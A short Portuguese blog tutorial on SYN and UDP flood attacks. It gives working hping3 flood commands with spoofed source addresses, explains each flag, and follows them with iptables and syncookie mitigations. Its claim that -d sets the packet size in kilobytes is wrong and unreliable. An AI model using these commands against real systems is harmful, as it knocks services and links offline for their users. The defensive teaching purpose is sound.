SYN
Flood
O
protocolo TCP, tem como característica, ser orientado à conexão, é
enviado um pacote de SYNcronismo para abertura de conexão com o
Servidor de destino, o qual envia uma resposta SYN, ACKnowledgement.
O pc de origem responde com um pacote ACK.
Com a
ferramenta hping3 é possível atacar um Servidor alvo, enviando
múltiplas requisições SYN.
O
resultado de um ataque SYN Flood é a indisponibilidade de
serviço.
#hping3
192.168.1.254 -S -p 80 --flood --rand-source
192.168.1.254 dispositivo alvo
-S
pacotes SYN
-p
80 porta tcp 80
--flood
enxurrada de pacotes
--rand-source
randomiza os endereços de origem
SYN
Flood - felizmente tem antídoto contra esse ataque:
Com
iptables
#iptables
-A INPUT -i eth0 -p tcp ! --syn -m conntrack --ctstate NEW -j DROP
ou
#echo
1 > /proc/sys/net/ipv4/tcp_syncookies
#nano
/etc/sysctl.conf
e
descomentar # net.ipv4.tcp_syncookies=1
UDP
Flood
Com um
ataque UDP Flood, as coisas se complicam, pois o protocolo udp não é
orientado à conexão. O resultado de um ataque UDP Flood é a
indisponibilidade do Link de dados.
Funciona
assim:
#hping3
192.168.1.254 -udp -p 1024 --flood -d 200 --rand-source (não
façam isso com intuito de lesar algo, pois é crime)
192.168.1.254
dispositivo alvo
-udp
dispara pacotes udp
-p
1024 porta de destino 1024
--flood
enxurrada de pacotes
-d
200 é o tamanho do pacote 200kb, o limite é 1200kb (com 1200kb
usa-se toda banda de 100Mb)
--rand-source
randomiza os endereços ip de origem
Contra
um ataque UDP Flood, você tem duas alternativas:
-rezar
-link
redundante
Com
iptables pode-se tentar remediar com:
#iptables
-t mangle -I PREROUTING -i eth0 -s 0/0 -p udp -m state --state NEW
! --sport 53 -j DROP
Nenhum comentário:
Postar um comentário